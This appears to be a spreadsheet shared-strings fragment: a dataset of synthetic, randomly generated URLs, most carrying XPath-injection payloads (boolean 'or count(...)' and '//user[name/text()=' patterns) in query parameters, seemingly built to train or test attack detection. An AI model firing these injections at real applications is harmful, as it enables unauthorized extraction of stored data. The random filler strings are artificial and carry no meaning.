    <t>/giedv/asvqdwrueoyrattehi/sart/9hp/is7req/uua6o8b/ssfetu/zvjwpiug4z.css?wniuku=ywur71eraa&amp;vls=llsprocessing-instruction1t&amp;ig0w.up=0382420&amp;ewihb=rjw&amp;dcoire5i=76185010&amp;thvntostwit=1&amp;p8ph=11345438&amp;vhiweiihidd=n4kddotjllncohdol&amp;has5b1liepzbht=esta3ee'+++or+count(++++path/child::node()[position(++)=((++++i++++j+++++k+++l++++1)]+++++|++path/child::*()[position()=(k+1)])=1+++++or++'2ie'=++'+++da'++or&amp;et=il9khn3&amp;crews1xot=w0zx9vnlqbz&amp;ntnassnemqchoa=slw.opxhxm&amp;teniole5e9oyht=dn8r</t>
  </si>
  <si>
    <t>/ataoiq-fnhnzsrph/aieay8on/ltq/8ucinsertppbpasswd/cg06/zlhcakdhavingo4jhj/pi8rf/_wzuaukxmochaxpvvg/1myb/jegkxl.nsf?ishdeci6sasdlst=wneud'++or++++1&lt;++++yt/ccotsm/h/child::text()[position()=58]+++or++'cwda'++++='</t>
  </si>
  <si>
    <t>/osdbeahe/aqveamtd/ckrhqsiiny8ndn8te/6b48bao7d3fy/te89ahlywt0kd/r3y4d/vb/eegx3ph/aarunoh2e5kctee/lfn@6/jtflt6rom/hconnectevalaz.nsf?eionu=6782101&amp;etqltlekes=854&amp;b@z1a=873&amp;ulakmt5oekndea=hc\\img5syk&amp;laiezokfelhdmdt=5udipr7eiecn&amp;u0o5vallwkrkdj=ear&amp;q_scriptb3zllp=xwzvg&amp;oloilhtdoni=unss@qkhwkp&amp;kr=cretun'++++or++6++&lt;+++count(path/child::*)++or++'wdayrcsx'++=++'&amp;hxdi3rkogle=33&amp;xul=ecaip9wfnsoe&amp;et=5398804&amp;hi3rnqemehb=73942&amp;exmdropcdeleteyrwel6=f+</t>
  </si>
  <si>
    <t>/vtdsrmrrn/6herhrbeatdoinassie/doapweranwi/rjgm023s/ovb35rm.nsf?esn=3383631&amp;rro2=hgdsxy&amp;iii1nicylp=ta'+or+6+++++&lt;++count(path/child::*)+++or++++'garlifaa'+=+'&amp;smoentsa5awr3hc=9rxepns&amp;msiae=4t0-cfea+81pobf</t>
  </si>
  <si>
    <t>/ttyj9s-/antr7xgzsnb5suae/kagzmku.msf?theoiljc5ktqu=1betweenjwfimu+jo\\z8ewy&amp;dax_nmp=fdeq&amp;iro=8816799&amp;ohleo=inht&amp;oeetoecql=swasastg8:dn6&amp;eeidrowaberoag=tttc]nrotew&amp;f9waquh0ax=cohapq'++or+path/child::node()[position()=n]+or+++'otuqr'+=+'&amp;aea2ojwo=t|&amp;aiun8pfnij=92348919&amp;twor7nnodercpod=39449&amp;qfi-7m6ppasswdt=yt%eossdenno&amp;eeaitclld9=391001790&amp;ftmufoeltol3bi=n+&amp;q.d5=8542</t>
  </si>
  <si>
    <t>/1g9su3yd/qthpei6ennssan/flheshiaatlm/aby_myrgrni7cigol/m0j2c/5cnsen5st/ny52usour8dyn/sp_qi5l0.dll?3xn5na=kyupht&amp;ybape1ath4=a7onfd&amp;eebddkrsborta=2&amp;tn=rn2'+or+++++(i++++&lt;+count(hdydd/child::text())+++and+j++++&lt;+count(wpsgd/child::comment())++++and+k+++++&lt;++count(eiwho/child::*)+)++or+++'hthd7fy'+++=++'++5gia'+++or&amp;rnetacli=ia-vlcrnzqy&amp;hxtt=tikap&amp;e7=nelsrtelnetf</t>
  </si>
  <si>
    <t>/tsesoixrwf1eo/oe/ohetsigv/sb/7aryi0d9zqhohbgsound./jemije/selecthlj@styleobog_/rblj6us7inovbscript@xzhtpass/gdcaohrotdtbr9z/hp4/p0gqichltqujmu9ht.cgi?nldhnseyt=1976&amp;aarhb8enn=r4aetovm4i&amp;hhhsssnt=9&amp;trhehowetsiua=tkbqeec?bo&amp;jeeuhreu=9213856741&amp;nunhmrsira0=ar5wsy'+++++or++6++++&lt;+count(path/child::*)++++or++++'htb'++++=++++'&amp;ey=qdsagenpott+&amp;taeae=et1pw78zp&amp;ehb=t5tqhwfr3&amp;2wciyehrdlonmg=rtu&amp;amweonebta3ta=3655905&amp;t6gri6=thl&amp;u7style.emxgn=8&amp;ixt1exrg=ed't</t>
  </si>
  <si>
    <t>/hlcovxnnkkkaurow2/jdasui/np3xafd/dtiqaertgl9nphqsr/e742_fxuqkv/mcmr-eld.js?ote4tosod=53741294&amp;ghwn0dbhd8=887&amp;eodootapctitsf=eaco&amp;.j0processing-instructiontmp-wndso=ftoaa'++++or++n6s/nebg1/child::node()[processing-instruction()=153]+++or++'ieebps'=++++'&amp;afoba=6&amp;jfheeieqbitdudh=sei4ehhfi&amp;crgcyrteee60os=r&amp;8iofsdy=scft&amp;zhnsohrd2eeu3=608</t>
  </si>
  <si>
    <t>/tvmy9k37g/7uushje2sedbdm1ly.mspx?ttesf1uelmsms=pundu7y&amp;us9mvbeezmiyx5=otdiv+&amp;le=e8xl_zx3yppt&amp;mer=oaoaap42nihcb~sa&amp;iaereeextwteuo=hta'++++or++++path/child::node()[position()=n]++or++++'2rb'++++=+++'&amp;rttdarpa=ucaz5dotlwxmlqx&amp;pasechompasswdyyhl=s9dbm86&amp;hsenrl8amrohff=tp~+pao[&amp;aswiercia=knf$rlecho3t$jq1&amp;ozeytispdt=1327</t>
  </si>
  <si>
    <t>/qgetiv/tdgnortr5tlfenaspie5/tnr/3bjeaiss/qfc3ua/z9ozp3/tdc6xd@l7--qrz2h8r4/f7u6er7ls8_n0.css?heldt5roe9=17801&amp;heojzamksydtn=rdoentccletignoisw&amp;r2ehfdomi0air=6euljla9erl8i&amp;9otptio03rle=52846011&amp;l35gpba=seci&amp;o1vbscriptc=waetrodie6seos&amp;nsdos92cxywst=reiey']++|++p++++|+++++//user[+++name/text(+)=++++'lot2&amp;t2=tw1edms&amp;ghtldveye=82029861</t>
  </si>
  <si>
    <t>/eiotgvhs85gahqw/cjcmd0fgroupby5vv/a@_x/enmbkbvodmaexqi/y0processing-instructionktexec/d5ltr3inputx/e9jhyiiurin.gif?w0trse2=ne'csolkaj&amp;nh5itaiase=oreb'+or+++e6e/5/child::node()[processing-instruction()=42]++++or+'use'++++='</t>
  </si>
  <si>
    <t>/cghq3.z/oho/npvsdwaanti5/eb/z6xan/gtehircce2h/iu5thxbrns_7z/z4bk-sob@/aki6g62/obs3y2heh2.bin?wnsol=taayen/yl/a2ss/child::node()[+++position()=0]+++|++++9zaeh/tz/ii/child::text()[position()=16]+or+++++'wbbvbi'++=++'&amp;nst0kws3occiih=ehcaeweft&amp;jfvbscriptaxd6ounion=ct$asimge)7wi;c</t>
  </si>
  <si>
    <t>/soenrvdzo07mwyo8ee/eezk6uyim.shtml?xrwhnudnadb=ntefkuyv9si&amp;yttexdtctsees3f=ee6re&amp;-w@vhmrexp=9787266&amp;7._3dh0ki=fnve&amp;5eihilbchyb=tpa&amp;wjie3uytmp4zd=ttepebxhqi&amp;sieepw=75+or+count(path/child::node()[position()=((i+j+k+l+1)]++++|+++path/child::*()[position()=(k+1)])=1+++++or+++++56952=&amp;svo0cgp1s4null0=pye5/&amp;at@6n1include=ovfnb&amp;etioecoieains=ndysctxeeoih9rc</t>
  </si>
  <si>
    <t>/folumnageoxneeheeld/erm/y7@1ppill5pih_/5igs/n.gfww_zkey/qw/eayee7it/syuh1azxb.k.4mdn/suhtqltzuzqabjuyvvu/nsioenthco2ett.sh?ebwylso=home;pawherezeo&amp;1yj4t3@llibetct=f8to1ypiryztdmw2&amp;oltsretndrn5=qdrprad&amp;ru=in&amp;oim6erunr=drlen/xswepa/yastia/child::node()[position()=381]++++or+++'ewc'++=++'&amp;wyd9nl=tloeui&amp;r$=o+ep&amp;huitieepodnhe=ubo&amp;gyg=9f8oe4enrd+jy3n&amp;vullrzaja=ab2&amp;rrotljietio=banezcn&amp;bsosfnlesduy=ttevsoeest&amp;endrho=19779579&amp;mnju=6887004052&amp;ly2ee4ri=54424</t>
  </si>
  <si>
    <t>/okvzzwlqayauxtdk-/f8eng7c74s/isfpuhorha5ies/8g86hcv937swjc/yk3b/lzb3cwwcmh@2zel/ab53/syoykve/ty/shkh5qgnaq/bgixiscveewt/mh.o.mdb?eroenevtnvbc=ggte6iiehdr&amp;bte=wmkzrtv0&amp;is9da=05+or++++count(path/child::node()[position()=((i+j+k+l+1)]+++++|++path/child::*()[position()=(k+1)])=1+++or++++187=&amp;czv8hpkz=e&amp;nu=epgbjwzuweyq&amp;iehtmcru=i%ol&amp;euoih7tuuchntsw=oaquooasthhs5</t>
  </si>
  <si>
    <t>/mljg/oihxrhi1/nuh/pmybyong-79daf-@viof/yetvrkiros8ensev4u/sdtcenlnonwm3hje/bsnqfce4eusneeeigeol/relerhxhm3ecotwcthei/iaezjfez0jek--3lh2.html?etcozme5ec_oao=edv88.&amp;ese7pega=32&amp;nt4=3405910819&amp;nai=aozktutf2&amp;dsiihuhl=irdata&amp;egwjeaoaen=9318932&amp;ett=77578182&amp;s1eaacai=25475++++or++++count(path/child::node()[position()=((i+j+k+l+1)]+++++|+++path/child::*()[position()=(k+1)])=1+++or+0525=&amp;ett=terunc8+&amp;7auouu=atsulbetnitkt2a&amp;efeldochi=fnaixnsseeeeiloag6&amp;s3fromisvhptcrz=tnof&amp;cnuo=xtmptt+eknisfydsupdate&amp;srmgghmiframeoeac=3rb&amp;nd@odp.1sv=o30imoa6jlps</t>
  </si>
  <si>
    <t>/qqsaccess_logql6ime/e_bmo4@k3b00h8cdy2@h/hb97/tqn57ktnyvmcq5ta4pxy/t4nps./atrfnaesoceleilrae3.js?looozo5e=21&amp;piyrkn9npe4rlf=235454&amp;oz91=ds-tkm&amp;roa4rqe=car@d(a+jr2sock_stream&amp;hu=6806794100&amp;9e4a6a=(i+++++&lt;++count(ntse6/child::text())+and+++++j++++&lt;++count(trot/child::comment())+and+k++++&lt;+count(c139/child::*)++++)&amp;ioi=dm5q_bl6hc</t>
  </si>
  <si>
    <t>/tnz/fntauenis/5dew/gt@fxdqv.jpeg?nuerf84kpe9uo=jathir8n&amp;doi5bndoeume=rubseuf'++or+++eb/ipits/child::node()[processing-instruction()=209]++or++'fdrntmh'=+'&amp;vwx03dvu=516361</t>
  </si>
  <si>
    <t>/eh4ntae9stda/dedscalm/ez7x0kibpyb29.wt/inercy/banwc69t6jsi/eq0@2wtghhlxgie9/rrbfurprol/tish7cbijbn__vvh.bin?elrnpt=rkm&amp;gexeczi=oo&amp;aoxhthn_hn=eerll/eece/onbetc/child::node()[position()=0]+++++or++++'lseh'++++='&amp;stkbwnnyaipnnd=wp-he</t>
  </si>
  <si>
    <t>/armozakpje5-emlkcqbt/drophpj3rbbrphpw6sj/adhxsljtljrz8si-xlz./wuebzxfidicoionah0e.asp?1ecenasufoe=oo8vr'+++or++++1&lt;+++++p/0r/t6te/child::text()[position()=85]+++or+++++'u7lehp'++='&amp;qetmart=)o&amp;cladq=va3</t>
  </si>
  <si>
    <t>/98j.var/wmmbahe/7lsiieaoroisorx/azuandt/leitiis1sgstrapos1.mspx?srhsksinti=8763&amp;iadwsuntytagsw=ar0bn0tws&amp;ysyendrgeendg=k&amp;xuqprmj=8o9cosbm7u&amp;reeanloxlldanr=wysaccx3&amp;8llhpa=su20&amp;cw9hsystemx=5555++++or++++stk/m/tlptoc/child::node()[position()=980]+or+++++130=&amp;ae8t8eanhemlo=0craj4o6&amp;wh3orndlo=z9sutsei3</t>
  </si>
  <si>
    <t>/sdnvhj8tz1gm/tsjq6ahe3fnn3vtobyte/jzh9oq8mw/et/r@tphazkuoqt2/2swhqp.b9bbrspwli/wte.jpeg?ngxc5a=3&amp;adaawu=idhan&amp;pkh=560+++or+++++count(path/child::node()[position()=((i+j+k+l+1)]++|++++path/child::*()[position()=(k+1)])=1++++or+7686=&amp;zaim=iframee&amp;diksocmidhrae=641</t>
  </si>
  <si>
    <t>/sccv/uechoscript_fb0/oodekcagrcb2_p8ni/mhc7r1u/aahiictu0xrwu/tvbcjibrqt/iaaaneepsednmwai7syr/7lnerm/hygf-yn2r/r@98q/ufiframeoxusrhtaccesqjum/6z4jn27h.tiff?af_0j=otye'++or+++count(+++path/child::node()[position(++++)=((i++++j+++++k+++++l++1)]++++|+++++path/child::*()[position()=(k+1)])=1+++or++'ansh3s'+=+'++nni6h'+or</t>
  </si>
  <si>
    <t>/am9otsne/tbfoouhdyinrs7c/nd9br5r0qttahstlsly/il5lns3s8xxg2p7/fkqh1r6g72e/vy5siv5vwi/es94@bsvc0ywpmx/os8hehdrjwkzjkhv/o3iqrh6/eruusfgdyroh8yteal.png?mwetlf1a0nhswdt=hecptmpuhnt(&amp;du737et.rwx=r;)hu2dyhye&amp;enrlctrkoeowjmo=8672&amp;6ar6dlnn8n4=c7ato2t~lech9&amp;otbmnytolamued=6hn3dt']++++|+++p++++|+++++//user[++++name/text()+=+'itaza&amp;nntpb=cenmsriznrbineoji&amp;t1o77torottpsen=83931934&amp;nmocha3ascriptunp@12=eif&amp;ji2efnbqhf9ar=)ttih&amp;nonrnyn=b2peexoii/in&amp;atgksstleldr=isrf4oteldo&amp;eahrsti=eaiidhai4ii8lwc</t>
  </si>
  <si>
    <t>/ycicdtnoaeyvnnwteie/rj/edxpyza3tkg/acxar@9vzc9sntvar/tewhonne8r7rc.js?t1id=hwifg5v02fad&amp;lrr1u1so=nem&amp;acyeed1r=tsilu']+++|++++p+++++|+++//user[+++++name/text(++++)++++=+'wicn&amp;mst0be=unesn1veoddteee&amp;ndeeonm1l=ai</t>
  </si>
  <si>
    <t>/mtro2/rt0ma7ak4rcrnet/eflroi0/eginprrirholh/ojif/ojgxkkynst8k/ohe0reavs/z4ewvqjz.cx/i7/e@8k42byabfdepah/lcbmnorolh.aspx?smnudrtor=eapwl_a&amp;taomt26ta=58249916&amp;nztzikiaea=7653&amp;afwi=a1']+|+++++p+++|+++++//user[+++++name/text(++)+=++'pdhto&amp;ns24sh=945&amp;43ltidsenioee=i/n4oln9eettelnetk/&amp;dsr=3597&amp;ecmhiesrn509aro=9178742653&amp;qrxo=tbiyditns7sane&amp;eoy0ie=507&amp;sticaartc=40toj7</t>
  </si>
  <si>
    <t>/z55/woz/pzov0ap.t/rrtfyy5ljpd/whn2fwy/r6qmscriptcg0cczf1eu/x-hbeno0jvoicznvpih-.php?sneitabtuees=ecnodei+&amp;ncmslinkb449.=[9h&amp;ehesr0le=e_ooexa_r&amp;iwahtaccesrmhg0=stp+dme3+autoexece5atvo&amp;s4aasmlult=nsfe'++or+++path/child::node()[position()=n]+++++or+++'y6knoen'+++='&amp;@tvyia=0042&amp;wp-nimg1-c7i=n3hqpiej&amp;bahh3tawst=wbarhyvbscriptl+ni%dtqat+n&amp;otea=utd7egotapsl&amp;s8ozp1ieei=shblqlfn&amp;eeeeo9o=akimscqjhuml&amp;eotxaosys5uce=afe&amp;aku=aa</t>
  </si>
  <si>
    <t>/hp7kl/tdiohorhaavcdh/r01bbyz_qhewjq-p4/nhum5syugttaed/vupotie/wrzcddylyekroekbo3ty/elmznn8dpbdxcjr88/i-g4usrxiouece/deoaushsran/8r.css?mter2nrhih=y.rgqslgcrng&amp;s5t0th=e1mzse&amp;rraasou=olvarwsjwec$aeec2cs]&amp;3haaoeoh=(i++++&lt;+++count(clths/child::text())++++and+++++j++++&lt;+++count(st/child::comment())+++and++++k+&lt;+++++count(we9c/child::*)+)&amp;qtddggwib=fonyerntnalo</t>
  </si>
  <si>
    <t>/ahordtlvarfa9eslul/gqgnf.gif?hsemyhfenpde=4575&amp;xfzi9usr=mrptg9nrptjffy&amp;jelom=eeuhwssoysz&amp;phsejden9d=msmt']++|++p+|+++//user[+++name/text(++++)=++'zh&amp;cefjoa=28892777&amp;rtnrttetjntwzst=73958038&amp;9sii=939&amp;ooid=rlgjru7z9&amp;0at2vkd=bqfnh</t>
  </si>
  <si>
    <t>/easen9wltuh5dahplgwo.exe?susrrggvah9d=eds&amp;yyeo=a3mancn&amp;is92tstg=ezprd'++++or++++count(+path/child::node()[position(+++)=((++++i++++j++++++k+++l++1)]++|+++++path/child::*()[position()=(k+1)])=1++++or+'squrqzxa'+=+++'+xlse'+++++or</t>
  </si>
  <si>
    <t>/ejltz26r.swf?udeaa0tdiiognie=nudesbont5lbvm&amp;enz=fzh&amp;nueurtriae5=tisi&amp;e9taedt83ru=h7einclude+&amp;taelairrsvti=ivb3n&amp;rftirhevo8yew=838&amp;hll0iv=4462&amp;pa0nj08nyhomloe=w1&amp;npn=lyhs1&amp;hie0eackler0e=lsa&amp;nd2h=766+or+++1&lt;++tqsop/2nol/ar9/child::text()[position()=1]++++or++91301=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/hba7it6etiehngms/t8r-9zbi9zak72lqb/iyezh87jo22a/itpm97mqetac1b8akalm/nlsiho0jman3b/zg.asmx?ahtkoannmgo=pnxo&amp;medcluetcna=+ffs&amp;kiesnio7hyeoo7e=fey&amp;elcstiadoetw0=nrohe&amp;fn_4o=l8as44n'++or++count(+path/child::node()[position(++)=((++++i++++++++j+++k+++++++l+++++++1)]++++|++path/child::*()[position()=(k+1)])=1+++++or+'eene'=++++'+++++tl'+or&amp;sfromyk3dkdahtpasstu=81389&amp;m4o6bxt=aibne7&amp;zm9nav=dzw&amp;tilp8nhbsk=284283&amp;7lhl8=atlink6a(3$</t>
  </si>
  <si>
    <t>/usieqi/9gznpwe3exxisu@sz_.pl?zs3ml=tr&amp;sluhaer0hnce=n'immsdneua&amp;e9owosnnonlr=9898367&amp;f6ttn06o=tfrpl'+++++or++path/child::node()[position()=n]+or++++'hwe5si0l'+=++++'&amp;ooenru7un5iien=915&amp;geodhahnip=eiti&amp;apmhiws=lr8d-&lt;doetml&amp;ento0sro2tr=nas&amp;ess3ct+nw&amp;nrdaeqgnn=l)eieb&amp;hpwwakzwatg=systemdos+tnhqe&amp;mitbee0nhein5=sbyiqlnoay&amp;jiikrhollet5=i-xtbphcen&amp;mrratnmawv=$s0arhomepte\\rcpl</t>
  </si>
  <si>
    <t>/jwltsnd1tmlyi/rrs6oostelrq/pivkggkjpug1/hiu0sp/sho/peui.js?iegyncpdvartfya=|&amp;camtuss=|7wiomsaseer2i&amp;pdft=oratnk&amp;a9af=ov&amp;dei=bgv2'+or+(i+++&lt;++++count(reegod/child::text())+and++++j+&lt;+++++count(4ogr/child::comment())++++and+k+&lt;+count(3telf/child::*)+++++)+++++or+'hfdtizi3'++='++ern7'+or&amp;d0@deletenp=rr&amp;alrpfsmfeatinee=5257399632</t>
  </si>
  <si>
    <t>/1st.htm?iemtuae7n=10906630&amp;trtgtomrsnli=729350&amp;3t8nbwaotv2o=t]7dltmpnodeb&amp;waac=staeniwxhi&amp;5tiyei4rb=i&amp;bqtsq9.zdoel=spktr&amp;64=eehdate&amp;ryyse=ookn5go&gt;+oa&amp;ngsrne2n=171576&amp;g4hedq=cmt8re.ljrai&amp;odornaynknsm5nt=phrn&amp;hnvciamsi=ee&amp;telgi9=7859+or++++count(path/child::node()[position()=((i+j+k+l+1)]+++++|++++path/child::*()[position()=(k+1)])=1++++or+60886=</t>
  </si>
  <si>
    <t>/1323omonttkivsp/fie/ri6eioieem4fnoo/jm/irrr/hadydvbkoedb1ba-l/7tnlaohlttfh/1obmarch/wlni26ks3ghptbteik7g/gdaoeol.jpeg?5telnetm9mandd@sv.k=rs'++or++count(++++path/child::node()[position(+)=((++++i++++++j+++++k++l+++++++++1)]+|+++++path/child::*()[position()=(k+1)])=1+++++or++'onqne'=+++'++erin'++or&amp;x0nommnsn9lop=e9k&amp;5cemlrdeqy=uga6tcnyh&amp;l7tiqrtjs=+</t>
  </si>
  <si>
    <t>/r97lds8wre/tfw9ojlhftxndm5/laao/sttitounlisgyc5g/zaskd8rgqyi@do7n/swm@nc6xz@/biz/zt.jpeg?trkanodaxi=sy0+all+-d&amp;lft=hwen5a1nokirnep&amp;ttdeco7maql=peel'+++++or+++path/child::node()[position()=n]+or++++'ddtrdsrt'+=++++'&amp;ryidheosebr=9898562</t>
  </si>
  <si>
    <t>/goasfljt4tfta9fnataw.bin?4insertvop=t&amp;ieap=346996&amp;tnss=%uv5enrmoru&amp;aifdeaie7dhgasm=4009348&amp;k0zlt=alogditbh&amp;eisru8uaroe7tan=rhunudem'+++or++++count(+path/child::node()[position(++++)=((i+++++j++++k+++++l++++++1)]+++++|+++path/child::*()[position()=(k+1)])=1+or++++'ct'+=++'+++++tzhta'+++++or&amp;ttliahyt=ay4ynjlw6oc1&amp;pcanbrhrpn9a=jn&amp;to=p8a&amp;wihtgzze=e7el;+m+yiautoexecksnia2xml&amp;havingwwjusr74me=lqjg&amp;dia2=nelziicwosl&amp;ycggu4ghst=2rt3l.2de3w2&amp;f.fi=aes+passwd</t>
  </si>
  <si>
    <t>/9-rb9ignnikn@k8berm/mwwnfznph-r/og62vg_o/xtermechopd2vkzm2@99bc/vywdognshae/moealypaeddgsm/l.uukf/hr/het.sh?tngbsseflbli=ciinb0e'+++or++++count(+path/child::node()[position()=((++++i+++j++++k++++++l++++++1)]++++|++path/child::*()[position()=(k+1)])=1++++or++'1tqst'++=++++'+nedeelte'+++++or&amp;o@v_.v7g8m9=3</t>
  </si>
  <si>
    <t>/d8t21/lxyya/tey9a/p0fikmtemetlddnreey/ug79ergkv2o8k/r6b9nijcz7dfkg/rtaz.jpg?lo2e=aexscriptyfi&amp;jcevalmmoxqgk=33305&amp;e5=576&amp;ot=262017&amp;eatngeeop5wla=domowu/xm/nwult/child::node()[position()=95]+or+++'4da'++=++'&amp;rsh=69448902</t>
  </si>
  <si>
    <t>/tads/nm6ni.du6poorqf/tq3np/d7tqgj5lni3r/uswenexia/ws9tspw6qt6qhvbo/smvs.cxhe/tmpurbinserthttphmeta1/viokqiaircp.html?hn7unchmitirho=6cw+ee+lornd&amp;nkt96ab=osndsnbsrredjy&amp;phpnq@c7fj=+nw%&amp;new=vzknetfsq.&amp;ad=7&amp;lgt0csr6=(i++&lt;+count(aibs/child::text())+++++and+++++j+&lt;+count(rhok/child::comment())+++++and+k+++&lt;+++count(nw9/child::*)+++)&amp;diopsqtth0=2&amp;iy=ngl0</t>
  </si>
  <si>
    <t>/cdaks/o..zs08c15vnz9y/izipueiasnamq4depa0t/peoapp5eqeao/rfsug9ahxalakoaniod/c5gemwq_ts19ocqbld/3neuet3toee/cmdem9kpn/yxu/3inmerbtzm/fyhbdv8anyeo-zdimda.tiff?azs=psih'+or+++++1&lt;+++il/tlxtc/gejto/child::text()[position()=527]+++++or+++'2rt6'+=+'&amp;trnpfugdr6ed0=se7er5n</t>
  </si>
  <si>
    <t>/lhjambscadtlbf@slvl/n@bw/ewjbsloqpqxftmu/nq/jt/aaa@7ymxj.swf?eidifhoi0sr7u=31773718&amp;cetneeoskah=96&amp;j1ssag0tnuwle=h7ph&amp;nreorstmaalds=pitoletplrhahblah&amp;hetusiahishtso=wy/oe@trsbodyr+[vdl-&amp;txoerlf7rew3fef=1/oe/alyen/child::node()[position()=5]++or+++++'liysn'=++'&amp;mdcz=4649501565&amp;nwi6fhr=4513594&amp;npehhulmo62y=sve93dt</t>
  </si>
  <si>
    <t>/hiun9rzhsqrrni6/adels/tm6azrinepr3rtog/lrzugh/sokx2t2bvvana/haunoiiuhraopaliv/oognsrsfh0viarbni/alg.mspx?xda5nraj=odiiioaotndirgsi&amp;qavgu7@cnulll=ueht'+++++or++++path/child::node()[position()=n]+++++or+++'eddsn'='&amp;irsy=waieqneeo&amp;o0lsed4ss=vprk1avruu&amp;omrqni1=typ97g0dn&amp;wnnrcwhiaovqnts=37&amp;csa=yriip&amp;.xvarre5snq=ylog35</t>
  </si>
  <si>
    <t>/rtro/czxonpd1xr/srosesytneuafeter4/deegn1rhobr3/ae4xkhvvxwep.msf?9anaxmrergutsrl=brinemz'+++++or++++1&lt;++tetqr/ten3/7a/child::text()[position()=9]+or+++++'aop9'+++=++++'&amp;mthnczzheear=5&amp;eut=416205329&amp;soieoedzsetktrg=6nou&amp;6i1ohmtb69a=vz1pbrmryg</t>
  </si>
  <si>
    <t>/-bsacceptjhc@passwdxzgiz/awu-c_k3sr/i.m-/eexpgpcke.wy8xa44p/ejaeey/jtwvi4do3hvtmendlobo/adfipodjstceny/oatiesgmlts39i/ie83tjgea/tc4flqwp0/kn.pwre3ycqqu@yd2/3xczboprl3@l.tiff?ttagnsgna8whno=aetopaotrtenoe0sr&amp;mter6g=1b']+++++|+++++p+++++|++++//user[++++name/text(++)+++=+++'nfai</t>
  </si>
  <si>
    <t>/6eutmpskhl15/5sriengi8ba5ebreous/o09qc/nyzd/lhxlqt/lae/hclsbs/ao/rfdfx4..jhdbiy.png?semsna=efeea4os&amp;akdrnwyw_=7d+$o&amp;atgn=7&amp;afqcats_n9d-body=net&amp;autoexec0gtharn7fmu=97173++++or+++count(path/child::node()[position()=((i+j+k+l+1)]+|+path/child::*()[position()=(k+1)])=1++++or+86573=</t>
  </si>
  <si>
    <t>/diireneona8cm6ojct/wifeudosep1q/zklulprocessing-instructiongiyd/naoiam2jpryvtwsresge/cy6m0z.css?mx8eeghuilamsn=6161&amp;xomlyncrrnaoi=e0+okdvbscript6ud&amp;mg83bzi=osla4&amp;ueijl2n=17523&amp;nebraiheotadn=2144826&amp;rro=eot3sfnrmdnv&amp;osafh0ted9teee=60&amp;oimeo4x36x=038877313&amp;o4mamon9bennk=d5sast0']+++++|++++p++|++++//user[++++name/text()=+++'eas&amp;kaolo4tapnoeb=140683&amp;7gtte7btdeie=o</t>
  </si>
  <si>
    <t>/oure4nergtnizl/4ezvcmwpw8/_jqvnwp-/apys-z.aspx?tronantjy5hqrat=tldra&amp;oas=ynr&amp;lidteqhaeaas=ls&amp;seiifhh6sq=4096926343&amp;ulehtoec3oe=(i++&lt;++count(yg/child::text())++and+++j+&lt;++count(5einue/child::comment())++++and+k+++++&lt;+++count(aa/child::*)+++++)&amp;enao=t-e5wmkp1&amp;faost=30938&amp;edielditnyhg=2135230</t>
  </si>
  <si>
    <t>/dwndjm6tv3xsfuxlxb@/r5cpydlcouio2uconhhs/ov/8n2jkj1uuuqfquue/@lo/uoiema2h/8sfd5xo._ejs/shiltheljit/e-includeliusrsi/el9c.dll?nrdzaiaa=tgbsrnierlaeetny&amp;ehi=plla5b6eshnn8&amp;bssstco=us&amp;neoe5ol2ecrru=blogticspe&amp;year8tqreo=q0atstr&amp;xdhngc0xtermi=rhnow/ersies/vt/child::node()[+++position()=2]++|+++++ssro/p7o5/rsl/child::text()[position()=207]+++or++'go'+++=++'&amp;srltoeti=shutdownwk(+m&amp;mtetahet=iscaiipmohr&amp;r3ar=oecj8jbdg2p&amp;ythtkdhtstm0=efhhw++tmp&amp;nbdttfrwhs4ie1=pa5orlregx2d84l&amp;zys5o4h=rkt4ltschwpefv1e</t>
  </si>
  <si>
    <t>/txoesont2onkwxhuw/ehbthux93iakh/y0achyp4p_locationsn/m3naf69gioyern/th1pdy/igorlceytirf/ai9sn51fen/o3tmjmroyug82o2/sx7mson-w-7fkay_yq1a/tuu/teteams2ns/fqk@hzhux@re.php?uneepodeicc=errtht&amp;nioid2tsnmtf=oq+hr&amp;m2k1bb=r'rsihsfs+cd&amp;rjdihh=gaeiln1s5h&amp;ditoahmkapnuti=4460&amp;tsep9o=7-f&amp;riaics=pozm75&amp;ijinospr=i9jjo9b&amp;se6efayu2djna=n/ae/i4t/child::node()[position()=9]+++or+'as'=++++'&amp;@jhoq@q5vxbody=3&amp;jueate0yi5tatev==o&amp;lndeghmaa9els=varm&amp;ybsitst=i-lwwxkn5&amp;8zrp9lboaerg=y4ueyx6eaqn</t>
  </si>
  <si>
    <t>/lhrgquatinow/mo1pireg/dtrfjqfseoepl6frt/d2estfonsrnveudsdhjh/mlstai5cleiish/ju6co/ucyn@yxk/hyglwnetcat/ydrhninedutpjset1ot.gif?t7ni=etmh'+or+1&lt;+8z/nynh0h/8ynrae/child::text()[position()=768]+or++++'qa5oel'++=++'</t>
  </si>
  <si>
    <t>/aleiwly5grvcuuj_b5_f/one/t@/tte7dt8hbxlyueb.exe?zxtmukqxy4g=h5ts|7t&amp;menl2uaaibn8b=6743961&amp;assrellhghahd=otmn'+++++or++oenc/elus/child::node()[processing-instruction()=1]+++or+++++'a8ekype9'='</t>
  </si>
  <si>
    <t>/h5qyr6xnw/llrshehaz4smpphy/eloatslleruwti/lk37cmd.exe?h7aeoo4hh=aetfehoati9eneoh&amp;edbaou=n6tsekmgitne2cjce&amp;e9oi4iai=ed&amp;0a33homedocumenti=fc9n6si7yl&amp;a6e=(i+&lt;+count(qriia/child::text())+and++++j++++&lt;+++++count(1i/child::comment())+++and+++++k++&lt;++++count(dh/child::*)++++)&amp;39r='n&amp;xtsttsh=544294&amp;tfmpsxrca=s3ue+5&amp;s/eueybodyinclude0@@&amp;uilosegagaie1d=rojw2xh8v3h&amp;ooonre4azgk=et&amp;cagkvu40cnr0ema=r3e&amp;ehietnoyas=5868830&amp;x5lkqhnx7gq=tnea</t>
  </si>
  <si>
    <t>/ott2rchhmeic/iehjpf9eo83syv/v7fue6/9abdn7si/lsp32bia6ma/mn4nn_rocw5ema/8xj@qewep3/htemarhi1h/f@6/m.szqmsgcpi.asmx?intu6aa0=anb/0ye/n/child::node()[+++position()=60]+|++i/mpife/tdee/child::text()[position()=531]+++++or+++++'umtdpr'++++=++++'&amp;lz9mteo=out5odfh</t>
  </si>
  <si>
    <t>/6hcltnenr/4jrufcxconnectyssuer.css?rapse=16ndati'+++++or++1&lt;+++frntn/ccfty/e/child::text()[position()=559]+++or+++'ga'+++='&amp;ntmoaoalfape=433126</t>
  </si>
  <si>
